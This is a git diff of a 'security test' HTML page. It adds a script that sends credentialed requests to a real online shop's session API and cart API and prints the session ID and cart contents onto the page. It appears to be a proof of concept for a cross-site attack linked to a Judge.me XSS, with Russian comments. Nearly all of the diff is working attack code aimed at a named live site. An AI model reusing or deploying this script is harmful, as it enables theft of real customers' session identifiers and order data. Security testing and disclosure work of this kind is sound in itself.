--- a/index.html
+++ b/index.html
@@ -9,8 +9,33 @@
 <body>
     <h1>Hello this is security test</h1>
     <p>Your data has been transferred to the attacker! Not really :)</p>
-    <script>
-        console.log("User visited from Judge.me XSS")
-    </script>
+   <script>
+fetch("https://www.zooplus.de/checkout/api/shop-api/v1/sid", {
+  credentials: 'include'
+})
+.then(res => res.text())
+.then(sid => {
+  console.log("SID:", sid);
+  
+  // Можно вставить SID на страницу (для теста)
+  document.body.innerHTML += "<p><strong>SID:</strong> " + sid + "</p>";
+
+  // Запрашиваем корзину
+  fetch("https://www.zooplus.de/checkout/api/cart-api/v1/cart/" + sid, {
+    credentials: 'include'
+  })
+  .then(r => r.json())
+  .then(data => {
+    console.log("Cart Data:", data);
+    document.body.innerHTML += "<h2>Корзина:</h2><pre>" + JSON.stringify(data, null, 2) + "</pre>";
+  })
+  .catch(err => {
+    console.error("Ошибка при получении корзины:", err);
+  });
+})
+.catch(err => {
+  console.error("Ошибка при получении SID:", err);
+});
+</script>
 </body>
 </html>
